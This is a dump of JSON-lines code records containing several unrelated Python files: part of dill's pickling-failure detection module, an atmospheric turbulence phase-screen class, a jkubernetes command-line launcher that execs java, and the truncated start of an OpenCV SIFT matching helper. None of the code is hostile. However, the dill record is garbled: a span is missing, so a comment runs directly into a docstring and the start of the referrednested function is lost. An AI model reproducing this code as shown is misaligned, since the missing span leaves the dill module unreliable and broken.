"#!/usr/bin/env python\n#\n# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)\n# Copyright (c) 2008-2016 California Institute of Technology.\n# Copyright (c) 2016-2019 The Uncertainty Quantification Foundation.\n# License: 3-clause BSD. 
The full license text is available at:\n# - https://github.com/uqfoundation/dill/blob/master/LICENSE\n\"\"\"\nMethods for detecting objects leading to pickling failures.\n\"\"\"\n\nimport dis\nfrom inspect import ismethod, isfunction, istraceback, isframe, iscode\nfrom .pointers import parent, reference, at, parents, children\n\nfrom ._dill import _trace as trace\nfrom ._dill import PY3\n\n__all__ = ['baditems','badobjects','badtypes','code','errors','freevars',\n 'getmodule','globalvars','nestedcode','nestedglobals','outermost',\n 'referredglobals','referrednested','trace','varnames']\n\ndef getmodule(object, _filename=None, force=False):\n \"\"\"get the module of the object\"\"\"\n from inspect import getmodule as getmod\n module = getmod(object, _filename)\n if module or not force: return module\n if PY3: builtins = 'builtins'\n else: builtins = '__builtin__'\n builtins = __import__(builtins)\n from .source import getname\n name = getname(object, force=True)\n return builtins if name in vars(builtins).keys() else None\n\ndef outermost(func): # is analogous to getsource(func,enclosing=True)\n \"\"\"get outermost enclosing object (i.e. the outer function in a closure)\n\n NOTE: this is the object-equivalent of getsource(func, enclosing=True)\n \"\"\"\n if PY3:\n if ismethod(func):\n _globals = func.__func__.__globals__ or {}\n elif isfunction(func):\n _globals = func.__globals__ or {}\n else:\n return #XXX: or raise? no matches\n _globals = _globals.items()\n else:\n if ismethod(func):\n _globals = func.im_func.func_globals or {}\n elif isfunction(func):\n _globals = func.func_globals or {}\n else:\n return #XXX: or raise? no matches\n _globals = _globals.iteritems()\n # get the enclosing source\n from .source import getsourcelines\n try: lines,lnum = getsourcelines(func, enclosing=True)\n except: #TypeError, IOError\n lines,lnum = [],None\n code = ''.join(lines)\n # get all possible names,objects that are named in the enclosing source\n _locals = ((name,obj) for (name,obj) in _globals if name in code)\n # now only save the objects that generate the enclosing block\n for name,obj in _locals: #XXX: don't really need 'name'\n try:\n if getsourcelines(obj) == (lines,lnum): return obj\n except: #TypeError, IOError\n pass\n return #XXX: or raise? no matches\n\ndef nestedcode(func, recurse=True): #XXX: or return dict of {co_name: co} ?\n \"\"\"get the code objects for any nested functions (e.g. in a closure)\"\"\"\n func = code(func)\n if not iscode(func): return [] #XXX: or raise? 
no matches\n nested = set()\n for co in func.co_consts:\n if co is None: continue\n co = code(co)\n if co:\n nested.add(co)\n if recurse: nested |= set(nestedcode(co, recurse=True))\n return list(nested)\n\ndef code(func):\n '''get the code object for the given function or method\n\n NOTE: use dill.source.getsource(CODEOBJ) to get the source code\n '''\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func): func = getattr(func, func_code)\n if istraceback(func): func = func.tb_frame\n if isframe(func): func = func.f_code\n if iscode(func): return func\n return\n\n#XXX: ugly: parse dis.dis for name after \" len(referrednested(func)), try calling func().\n If possible, python builds code objects, but delays building functions\n until func() is called.\n \"\"\"\n if PY3:\n att1 = '__code__'\n att0 = '__func__'\n else:\n att1 = 'func_code' # functions\n att0 = 'im_func' # methods\n\n import gc\n funcs = set()\n # get the code objects, and try to track down by referrence\n for co in nestedcode(func, recurse):\n # look for function objects that refer to the code object\n for obj in gc.get_referrers(co):\n # get methods\n _ = getattr(obj, att0, None) # ismethod\n if getattr(_, att1, None) is co: funcs.add(obj)\n # get functions\n elif getattr(obj, att1, None) is co: funcs.add(obj)\n # get frame objects\n elif getattr(obj, 'f_code', None) is co: funcs.add(obj)\n # get code objects\n elif hasattr(obj, 'co_code') and obj is co: funcs.add(obj)\n# frameobjs => func.func_code.co_varnames not in func.func_code.co_cellvars\n# funcobjs => func.func_code.co_cellvars not in func.func_code.co_varnames\n# frameobjs are not found, however funcobjs are...\n# (see: test_mixins.quad ... 
and test_mixins.wtf)\n# after execution, code objects get compiled, and then may be found by gc\n return list(funcs)\n\n\ndef freevars(func):\n \"\"\"get objects defined in enclosing code that are referred to by func\n\n returns a dict of {name:object}\"\"\"\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n func_closure = '__closure__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n func_closure = 'func_closure'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func):\n closures = getattr(func, func_closure) or ()\n func = getattr(func, func_code).co_freevars # get freevars\n else:\n return {}\n return dict((name,c.cell_contents) for (name,c) in zip(func,closures))\n\n# thanks to Davies Liu for recursion of globals\ndef nestedglobals(func, recurse=True):\n \"\"\"get the names of any globals found within func\"\"\"\n func = code(func)\n if func is None: return list()\n from .temp import capture\n names = set()\n with capture('stdout') as out:\n dis.dis(func) #XXX: dis.dis(None) disassembles last traceback\n for line in out.getvalue().splitlines():\n if '_GLOBAL' in line:\n name = line.split('(')[-1].split(')')[0]\n names.add(name)\n for co in getattr(func, 'co_consts', tuple()):\n if co and recurse and iscode(co):\n names.update(nestedglobals(co, recurse=True))\n return list(names)\n\ndef referredglobals(func, recurse=True, builtin=False):\n \"\"\"get the names of objects in the global scope referred to by func\"\"\"\n return globalvars(func, recurse, builtin).keys()\n\ndef globalvars(func, recurse=True, builtin=False):\n \"\"\"get objects defined in global scope that are referred to by func\n\n return a dict of {name:object}\"\"\"\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n func_globals = '__globals__'\n func_closure = '__closure__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n func_globals = 'func_globals'\n func_closure = 'func_closure'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func):\n globs = vars(getmodule(sum)).copy() if builtin else {}\n # get references from within closure\n orig_func, func = func, set()\n for obj in getattr(orig_func, func_closure) or {}:\n _vars = globalvars(obj.cell_contents, recurse, builtin) or {}\n func.update(_vars) #XXX: (above) be wary of infinte recursion?\n globs.update(_vars)\n # get globals\n globs.update(getattr(orig_func, func_globals) or {})\n # get names of references\n if not recurse:\n func.update(getattr(orig_func, func_code).co_names)\n else:\n func.update(nestedglobals(getattr(orig_func, func_code)))\n # find globals for all entries of func\n for key in func.copy(): #XXX: unnecessary...?\n nested_func = globs.get(key)\n if nested_func is orig_func:\n #func.remove(key) if key in func else None\n continue #XXX: globalvars(func, False)?\n func.update(globalvars(nested_func, True, builtin))\n elif iscode(func):\n globs = vars(getmodule(sum)).copy() if builtin else {}\n #globs.update(globals())\n if not recurse:\n func = func.co_names # get names\n else:\n orig_func = func.co_name # to stop infinite recursion\n func = set(nestedglobals(func))\n # find globals for all entries of func\n for key in func.copy(): #XXX: unnecessary...?\n if key is orig_func:\n #func.remove(key) if key in func else None\n continue #XXX: globalvars(func, False)?\n nested_func = globs.get(key)\n func.update(globalvars(nested_func, True, builtin))\n else:\n return {}\n #NOTE: if name not in func_globals, then we skip it...\n return dict((name,globs[name]) for name in func if name in 
globs)\n\n\ndef varnames(func):\n \"\"\"get names of variables defined by func\n\n returns a tuple (local vars, local vars referrenced by nested functions)\"\"\"\n func = code(func)\n if not iscode(func):\n return () #XXX: better ((),())? or None?\n return func.co_varnames, func.co_cellvars\n\n\ndef baditems(obj, exact=False, safe=False): #XXX: obj=globals() ?\n \"\"\"get items in object that fail to pickle\"\"\"\n if not hasattr(obj,'__iter__'): # is not iterable\n return [j for j in (badobjects(obj,0,exact,safe),) if j is not None]\n obj = obj.values() if getattr(obj,'values',None) else obj\n _obj = [] # can't use a set, as items may be unhashable\n [_obj.append(badobjects(i,0,exact,safe)) for i in obj if i not in _obj]\n return [j for j in _obj if j is not None]\n\n\ndef badobjects(obj, depth=0, exact=False, safe=False):\n \"\"\"get objects that fail to pickle\"\"\"\n from dill import pickles\n if not depth:\n if pickles(obj,exact,safe): return None\n return obj\n return dict(((attr, badobjects(getattr(obj,attr),depth-1,exact,safe)) \\\n for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))\n\ndef badtypes(obj, depth=0, exact=False, safe=False):\n \"\"\"get types for objects that fail to pickle\"\"\"\n from dill import pickles\n if not depth:\n if pickles(obj,exact,safe): return None\n return type(obj)\n return dict(((attr, badtypes(getattr(obj,attr),depth-1,exact,safe)) \\\n for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))\n\ndef errors(obj, depth=0, exact=False, safe=False):\n \"\"\"get errors for objects that fail to pickle\"\"\"\n from dill import pickles, copy\n if not depth:\n try:\n pik = copy(obj)\n if exact:\n assert pik == obj, \\\n \"Unpickling produces %s instead of %s\" % (pik,obj)\n assert type(pik) == type(obj), \\\n \"Unpickling produces %s instead of %s\" % (type(pik),type(obj))\n return None\n except Exception:\n import sys\n return sys.exc_info()[1]\n _dict = {}\n for attr in dir(obj):\n try:\n _attr = getattr(obj,attr)\n except Exception:\n import sys\n _dict[attr] = sys.exc_info()[1]\n continue\n if not pickles(_attr,exact,safe):\n _dict[attr] = errors(_attr,depth-1,exact,safe)\n return _dict\n\n\n# EOF\n"} {"ext": "py", "sha": "1a305deddb86a2c4ba2982c43b54d1ee77b798ba", "content": "from __future__ import division\n\nfrom .atmospheric_model import AtmosphericLayer, phase_covariance_von_karman, fried_parameter_from_Cn_squared\nfrom ..statistics import SpectralNoiseFactoryMultiscale\nfrom ..field import Field, RegularCoords, UnstructuredCoords, CartesianGrid\nfrom .finite_atmospheric_layer import FiniteAtmosphericLayer\n\nimport numpy as np\nfrom scipy import linalg\nfrom scipy.ndimage import affine_transform\n\nimport time\nimport warnings\n\nclass InfiniteAtmosphericLayer(AtmosphericLayer):\n\tdef __init__(self, input_grid, Cn_squared=None, L0=np.inf, velocity=0, height=0, stencil_length=2, use_interpolation=False):\n\t\tself._initialized = False\n\n\t\tAtmosphericLayer.__init__(self, input_grid, Cn_squared, L0, velocity, height)\n\n\t\t# Check properties of input_grid\n\t\tif not input_grid.is_('cartesian'):\n\t\t\traise ValueError('Input grid must be cartesian.')\n\t\tif not input_grid.is_regular:\n\t\t\traise ValueError('Input grid must be regularly spaced')\n\t\tif not input_grid.ndim == 2:\n\t\t\traise ValueError('Input grid must be two-dimensional.')\n\n\t\tself.stencil_length = stencil_length\n\t\tself.use_interpolation = 
use_interpolation\n\n\t\tself._make_stencils()\n\t\tself._make_covariance_matrices()\n\t\tself._make_AB_matrices()\n\t\tself._make_initial_phase_screen()\n\n\t\tself.center = np.zeros(2)\n\n\t\tself._initialized = True\n\t\n\tdef _recalculate_matrices(self):\n\t\tif self._initialized:\n\t\t\tself._make_covariance_matrices()\n\t\t\tself._make_AB_matrices()\n\t\n\tdef _make_stencils(self):\n\t\t# Vertical\n\t\tself.new_grid_bottom = CartesianGrid(RegularCoords(self.input_grid.delta, [self.input_grid.dims[0], 1], self.input_grid.zero - np.array([0, self.input_grid.delta[1]])))\n\t\t\n\t\tself.stencil_bottom = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped\n\t\tself.stencil_bottom[:self.stencil_length,:] = True\n\t\t\n\t\tfor i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[0])):\n\t\t\tself.stencil_bottom[(n + self.stencil_length - 1) % self.input_grid.dims[1],i] = True\n\t\t\n\t\tself.stencil_bottom = self.stencil_bottom.ravel()\n\t\tself.num_stencils_vertical = np.sum(self.stencil_bottom)\n\t\t\n\t\t# Horizontal\n\t\tself.new_grid_left = CartesianGrid(RegularCoords(self.input_grid.delta, [1, self.input_grid.dims[1]], self.input_grid.zero - np.array([self.input_grid.delta[0], 0])))\n\n\t\tself.stencil_left = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped\n\t\tself.stencil_left[:,:self.stencil_length] = True\n\t\t\n\t\tfor i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[1])):\n\t\t\tself.stencil_left[i,(n + self.stencil_length - 1) % self.input_grid.dims[0]] = True\n\t\t\n\t\tself.stencil_left = self.stencil_left.ravel()\n\t\tself.num_stencils_horizontal = np.sum(self.stencil_left)\n\t\n\tdef _make_covariance_matrices(self):\n\t\tphase_covariance = phase_covariance_von_karman(fried_parameter_from_Cn_squared(1, 1), self.L0)\n\n\t\t# Vertical\n\t\tx = np.concatenate((self.input_grid.x[self.stencil_bottom], self.new_grid_bottom.x))\n\t\tx = np.concatenate([x - xx for xx in x])\n\t\ty = np.concatenate((self.input_grid.y[self.stencil_bottom], self.new_grid_bottom.y))\n\t\ty = np.concatenate([y - yy for yy in y])\n\n\t\tseparations = CartesianGrid(UnstructuredCoords((x, y)))\n\t\tn = self.new_grid_bottom.size + self.num_stencils_vertical\n\t\tself.cov_matrix_vertical = phase_covariance(separations).reshape((n, n))\n\n\t\t# Horizontal\n\t\tx = np.concatenate((self.input_grid.x[self.stencil_left], self.new_grid_left.x))\n\t\tx = np.concatenate([x - xx for xx in x])\n\t\ty = np.concatenate((self.input_grid.y[self.stencil_left], self.new_grid_left.y))\n\t\ty = np.concatenate([y - yy for yy in y])\n\n\t\tseparations = CartesianGrid(UnstructuredCoords((x, y)))\n\t\tn = self.new_grid_left.size + self.num_stencils_horizontal\n\t\tself.cov_matrix_horizontal = phase_covariance(separations).reshape((n, n))\n\t\n\tdef _make_AB_matrices(self):\n\t\t# Vertical\n\t\tn = self.num_stencils_vertical\n\t\tcov_zz = self.cov_matrix_vertical[:n,:n]\n\t\tcov_xz = self.cov_matrix_vertical[n:, :n]\n\t\tcov_zx = self.cov_matrix_vertical[:n, n:]\n\t\tcov_xx = self.cov_matrix_vertical[n:, n:]\n\t\t\n\t\tcf = linalg.cho_factor(cov_zz)\n\t\tinv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))\n\n\t\tself.A_vertical = cov_xz.dot(inv_cov_zz)\n\n\t\tBBt = cov_xx - self.A_vertical.dot(cov_zx)\n\n\t\tU, S, Vt = np.linalg.svd(BBt)\n\t\tL = np.sqrt(S[:self.input_grid.dims[0]])\n\n\t\tself.B_vertical = U * L\n\t\t\n\t\t# Horizontal\n\t\tn = self.num_stencils_horizontal\n\t\tcov_zz = self.cov_matrix_horizontal[:n,:n]\n\t\tcov_xz = 
self.cov_matrix_horizontal[n:, :n]\n\t\tcov_zx = self.cov_matrix_horizontal[:n, n:]\n\t\tcov_xx = self.cov_matrix_horizontal[n:, n:]\n\t\t\n\t\tcf = linalg.cho_factor(cov_zz)\n\t\tinv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))\n\n\t\tself.A_horizontal = cov_xz.dot(inv_cov_zz)\n\n\t\tBBt = cov_xx - self.A_horizontal.dot(cov_zx)\n\n\t\tU, S, Vt = np.linalg.svd(BBt)\n\t\tL = np.sqrt(S[:self.input_grid.dims[1]])\n\n\t\tself.B_horizontal = U * L\n\n\tdef _make_initial_phase_screen(self):\n\t\toversampling = 16\n\t\tlayer = FiniteAtmosphericLayer(self.input_grid, self.Cn_squared, self.outer_scale, self.velocity, self.height, oversampling)\n\t\tself._achromatic_screen = layer.phase_for(1)\n\t\tself._shifted_achromatic_screen = self._achromatic_screen\n\n\tdef _extrude(self, where=None):\n\t\tflipped = (where == 'top') or (where == 'right')\n\t\thorizontal = (where == 'left') or (where == 'right')\n\n\t\tif where == 'top' or where == 'right':\n\t\t\tscreen = self._achromatic_screen[::-1]\n\t\telse:\n\t\t\tscreen = self._achromatic_screen\n\n\t\tif horizontal:\n\t\t\tstencil = self.stencil_left\n\t\t\tA = self.A_horizontal\n\t\t\tB = self.B_horizontal\n\t\telse:\n\t\t\tstencil = self.stencil_bottom\n\t\t\tA = self.A_vertical\n\t\t\tB = self.B_vertical\n\t\t\n\t\tstencil_data = screen[stencil]\n\t\trandom_data = np.random.normal(0, 1, size=B.shape[1])\n\t\tnew_slice = A.dot(stencil_data) + B.dot(random_data) * np.sqrt(self._Cn_squared)\n\n\t\tscreen = screen.shaped\n\n\t\tif horizontal:\n\t\t\tscreen = np.hstack((new_slice[:,np.newaxis], screen[:,:-1]))\n\t\telse:\n\t\t\tscreen = np.vstack((new_slice[np.newaxis,:], screen[:-1,:]))\n\t\t\n\t\tscreen = Field(screen, self.input_grid)\n\t\t\n\t\tif flipped:\n\t\t\tself._achromatic_screen = screen[::-1,::-1].ravel()\n\t\telse:\n\t\t\tself._achromatic_screen = screen.ravel()\n\n\tdef phase_for(self, wavelength):\n\t\treturn self._shifted_achromatic_screen / wavelength\n\n\tdef reset(self):\n\t\tself._make_initial_phase_screen()\n\t\tself.center = np.zeros(2)\n\t\tself._t = 0\n\t\n\tdef evolve_until(self, t):\n\t\tif t is None:\n\t\t\tself.reset()\n\t\t\treturn\n\t\t\n\t\told_center = np.round(self.center / self.input_grid.delta).astype('int')\n\n\t\tself.center = self.velocity * t\n\t\tnew_center = np.round(self.center / self.input_grid.delta).astype('int')\n\n\t\tdelta = new_center - old_center\n\n\t\tfor i in range(abs(delta[0])):\n\t\t\tif delta[0] < 0:\n\t\t\t\tself._extrude('left')\n\t\t\telse:\n\t\t\t\tself._extrude('right')\n\n\t\tfor i in range(abs(delta[1])):\n\t\t\tif delta[1] < 0:\n\t\t\t\tself._extrude('bottom')\n\t\t\telse:\n\t\t\t\tself._extrude('top')\n\t\t\n\t\tif self.use_interpolation:\n\t\t\t# Use bilinear interpolation to interpolate the achromatic phase screen to the correct position.\n\t\t\t# This is to avoid sudden shifts by discrete pixels.\n\t\t\tps = self._achromatic_screen.shaped\n\t\t\tsub_delta = self.center - new_center * self.input_grid.delta\n\t\t\twith warnings.catch_warnings():\n\t\t\t\twarnings.filterwarnings('ignore', message='The behaviour of affine_transform with a one-dimensional array supplied for the matrix parameter has changed in scipy 0.18.0.')\n\t\t\t\tself._shifted_achromatic_screen = affine_transform(ps, np.array([1,1]), (sub_delta / self.input_grid.delta)[::-1], mode='nearest', order=1).ravel()\n\t\telse:\n\t\t\tself._shifted_achromatic_screen = self._achromatic_screen\n\n\t@property\n\tdef Cn_squared(self):\n\t\treturn self._Cn_squared\n\t\n\t@Cn_squared.setter\n\tdef Cn_squared(self, 
Cn_squared):\n\t\tself._Cn_squared = Cn_squared\n\t\n\t@property\n\tdef outer_scale(self):\n\t\treturn self._L0\n\n\t@outer_scale.setter\n\tdef L0(self, L0):\n\t\tself._L0 = L0\n\n\t\tself._recalculate_matrices()"} {"ext": "py", "sha": "1a305f2fba69629b890dad5bc0f21b54b8cebba3", "content": "#!/bin/env python\n\nimport os \nimport sys\nimport random\nimport subprocess as sub\nimport getopt\nimport time\n\ndef identity(x):\n return x\n\ndef cygpath(x):\n command = [\"cygpath\", \"-wp\", x]\n p = sub.Popen(command,stdout=sub.PIPE)\n output, errors = p.communicate()\n lines = output.split(\"\\n\")\n return lines[0]\n\nif sys.platform == \"cygwin\":\n normclasspath = cygpath\nelse:\n normclasspath = identity\n\nCUSTOM_CONF_FILE = \"\"\nCONFIG_OPTS = []\nSTATUS = 0\nJKUBERNETES_DIR = \"/\".join(os.path.realpath( __file__ ).split(\"/\")[:-2])\nJKUBERNETES_CONF_DIR = os.getenv(\"JKUBERNETES_CONF_DIR\", JKUBERNETES_DIR + \"/conf\" )\nCONFIG_OPTS = []\nEXCLUDE_JARS = []\nINCLUDE_JARS = []\n\nAPI_SERVER_ADDRESS = \"\"\nJKUBERNETES_CREATE_YAML_PATH = \"\"\n\ndef check_java():\n check_java_cmd = 'which java'\n ret = os.system(check_java_cmd)\n if ret != 0:\n print(\"Failed to find java, please add java to PATH\")\n sys.exit(-1)\n\ndef print_commands():\n \"\"\"Print all client commands and link to documentation\"\"\"\n print (\"kubectl command [-s http://apiserverip:port]\")\n print (\"Commands:\\n\\t\", \"\\n\\t\".join(sorted(COMMANDS.keys())))\n print (\"\\nHelp:\", \"\\n\\thelp\", \"\\n\\thelp \")\n print (\"\\nDocumentation for the jkubernetes client can be found at https://github.com/gwisoft/jkubernetes/wiki/jkubernetes-Chinese-Documentation\\n\")\n\n\ndef get_jars_full(adir):\n ret = []\n temp = adir.strip()\n print (temp == \"\")\n \n if temp == \"\":\n return ret \n files = os.listdir(adir)\n for f in files:\n if f.endswith(\".jar\") == False:\n continue\n filter = False\n for exclude_jar in EXCLUDE_JARS:\n if f.find(exclude_jar) >= 0:\n filter = True\n break\n \n if filter == True:\n print (\"Don't add \" + f + \" to classpath\")\n else:\n ret.append(adir + \"/\" + f)\n return ret\n\n\ndef unknown_command(*args):\n print (\"Unknown command: [kubectl %s]\" % ' '.join(sys.argv[1:]))\n print_usage()\n \ndef print_usage(command=None):\n \"\"\"Print one help message or list of available commands\"\"\"\n if command != None:\n if command in COMMANDS:\n print (COMMANDS[command].__doc__ or \n \"No documentation provided for <%s>\" % command)\n else:\n print (\"<%s> is not a valid command\" % command)\n else:\n print_commands()\n\ndef parse_config_opts_and_args(args):\n\tcurr = args[:]\n\tcurr.reverse()\n\tconfig_list = []\n\targs_list = []\n\t\n\twhile len(curr) > 0:\n\t\ttoken = curr.pop()\n\t\tif token == \"-s\":\n\t\t\tglobal API_SERVER_ADDRESS\n\t\t\tAPI_SERVER_ADDRESS = curr.pop()\n\t\telif token == \"-c\":\n\t\t\tconfig_list.append(curr.pop())\t\n\t\telif token == \"--config\":\n\t\t\tglobal CUSTOM_CONF_FILE\n\t\t\tCUSTOM_CONF_FILE = curr.pop()\t\t\t\n\t\telse:\n\t\t\targs_list.append(token)\t\n\tprint (\"config_list=\")\n\tprint (config_list)\n\tprint (\"args_list=\")\n\tprint (args_list)\n\treturn config_list, args_list\n \ndef parse_config_opts(config_list):\n global CONFIG_OPTS\n if len(config_list) > 0:\n for config in config_list:\n CONFIG_OPTS.append(config) \n\ndef filter_array(array):\n ret = []\n for item in array:\n temp = item.strip()\n if temp != \"\":\n ret.append(temp)\n return ret \n\ndef get_config_opts():\n global CONFIG_OPTS\n print (\"-Dkubernetes.options=\" + 
(','.join(CONFIG_OPTS)).replace(' ', \"%%%%\"))\n return \"-Dkubernetes.options=\" + (','.join(CONFIG_OPTS)).replace(' ', \"%%%%\")\n \n\n#扩展的jar包入参 \ndef get_exclude_jars():\n global EXCLUDE_JARS\n return \" -Dexclude.jars=\" + (','.join(EXCLUDE_JARS)) \n\ndef create(args):\n\t\"\"\"\n\tkubectl create -f ***.yaml\n\t\"\"\"\n\tpass\n\n\targs = parse_client_createopts(args)\n\t\n\tchildopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n\tprint (\"childopts=\")\n\tprint (childopts)\n\texec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlCreate\",\n jvmtype=\"-client -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\")\n\ndef kube(args):\n\t\"\"\"\n\tkubectl kube\n\t\"\"\"\n\tpass\n\t\n\tchildopts = get_client_customopts() + get_exclude_jars()\n\tprint (\"childopts=\")\n\tprint (childopts)\n\texec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.daemon.kube.KubeServer\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"true\")\n\ndef kubelet(args):\n \"\"\"\n kubectl kubelet\n \"\"\"\n pass\n \n childopts = get_client_customopts() + get_exclude_jars()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.daemon.kubelet.Kubelet\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"true\")\n \ndef delete(args):\n \"\"\"\n kubectl delete -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlDelete\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \ndef rollingUpdate(args):\n \"\"\"\n kubectl rolling-update [old topology name] -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlRollingUpdate\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \ndef replace(args):\n \"\"\"\n kubectl replace -f ***.yaml\n \"\"\"\n pass\n\n args = parse_client_createopts(args)\n \n childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlReplace\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\")\n \ndef get(args):\n \"\"\"\n kubectl get po [topology name]\n \"\"\"\n pass\n \n childopts = get_client_customopts() + get_exclude_jars()\n print (\"childopts=\")\n print (childopts)\n exec_jkubernetes_class(\n \"org.gwisoft.jkubernetes.kubectl.KubectlGet\",\n jvmtype=\"-server -Xms256m -Xmx256m\",\n 
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + \"/bin\",CUSTOM_CONF_FILE],\n args=args,\n childopts=childopts,\n isBackgroundRun=\"false\") \n \t\ndef get_client_createopts():\n\tret = (\" -Dkubernetes.create.yaml=\" + JKUBERNETES_CREATE_YAML_PATH + \" -Dkubernetes.apiserver.address=\" + API_SERVER_ADDRESS)\n\treturn ret\n\ndef parse_client_createopts(args):\n\tprint (\"parse_client_createopts=\")\n\tprint (args)\n\tcurr = args\n\tcurr.reverse()\n\targs_list = []\n\twhile len(curr) > 0:\n\t\ttoken = curr.pop()\n\t\tprint (token == \"-f\")\n\t\tif token == \"-f\":\n\t\t\tglobal JKUBERNETES_CREATE_YAML_PATH\n\t\t\tJKUBERNETES_CREATE_YAML_PATH = curr.pop()\n\t\telse:\n\t\t\targs_list.append(token)\n\tprint (args_list)\t\t\n\treturn \targs_list\t\n\t\t\ndef exec_jkubernetes_class(klass, jvmtype=\"-server\", sysdirs=[], args=[], childopts=\"\",isBackgroundRun=\"\"):\n \n args_str = \" \".join(args)\n \n command = \"java \" + \" -Dkubernetes.home=\" + JKUBERNETES_DIR + \" \" + get_config_opts() + \" \" + childopts + \" -cp \" + get_classpath(sysdirs) + \" \" + klass + \" \" + args_str\n \n print (\"Running: \" + command)\n global STATUS\n STATUS = os.execvp(\"java\", filter_array(command.split(\" \")))\n\n#系统自定义的配置入参 \ndef get_client_customopts():\n ret = (\"\")\n \"\"\"\n ret = (\" -Dkubernetes.root.logger=INFO,stdout -Dlogback.configurationFile=\" + JKUBERNETES_DIR +\n \"/conf/client_logback.xml -Dlog4j.configuration=File:\" + JKUBERNETES_DIR + \n \"/conf/client_log4j.properties\")\n \"\"\" \n return ret\n\ndef get_classpath(extrajars):\n ret = []\n ret.extend(extrajars)\n ret.extend(get_jars_full(JKUBERNETES_DIR))\n ret.extend(get_jars_full(JKUBERNETES_DIR + \"/lib\"))\n ret.extend(INCLUDE_JARS)\n return normclasspath(\":\".join(ret))\n \n \t \ndef main():\n\tif len(sys.argv) <= 1:\n\t\tprint_usage()\n\t\tsys.exit(-1)\n\t\t\t\n\tglobal CONFIG_OPTS\n\tconfig_list, args = parse_config_opts_and_args(sys.argv[1:])\n\tparse_config_opts(config_list)\n\tCOMMAND = args[0]\n\tARGS = args[1:]\n\tif COMMANDS.get(COMMAND) == None:\n\t\tunknown_command(COMMAND)\n\t\tsys.exit(-1)\n\tif len(ARGS) != 0 and ARGS[0] == \"help\":\n\t\tprint_usage(COMMAND)\n\t\tsys.exit(0)\n\ttry:\n\t\t(COMMANDS.get(COMMAND,\"help\"))(ARGS)\n\texcept Exception as msg:\n\t\tprint(msg)\n\t\tprint_usage(COMMAND)\n\t\tsys.exit(-1)\n\tsys.exit(STATUS)\n\nCOMMANDS = {\"create\": create,\"kube\":kube,\"kubelet\":kubelet,\"delete\":delete,\"rolling-update\":rollingUpdate,\"replace\":replace,\"get\":get}\n\t\t \nif __name__ == \"__main__\":\n #check_java()\n main()\n"} {"ext": "py", "sha": "1a305f413095051a324e8a035128541b13d6768f", "content": "import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom .log import logger\n\nMATCHER_DEBUG = False\nFLANN_INDEX_KDTREE = 0\nGOOD_DISTANCE_LIMIT = 0.7\nSIFT = cv2.SIFT_create()\n\n\ndef is_in_poly(p, poly):\n \"\"\"\n :param p: [x, y]\n :param poly: [[], [], [], [], ...]\n :return:\n \"\"\"\n px, py = p\n is_in = False\n for i, corner in enumerate(poly):\n next_i = i + 1 if i + 1 < len(poly) else 0\n x1, y1 = corner\n x2, y2 = poly[next_i]\n if (x1 == px and y1 == py) or (x2 == px and y2 == py): # if point is on vertex\n is_in = True\n break\n if min(y1, y2) < py <= max(y1, y2): # find horizontal edges of polygon\n x = x1 + (py - y1) * (x2 - x1) / (y2 - y1)\n if x == px: # if point is on edge\n is_in = True\n break\n elif x > px: # if point is on 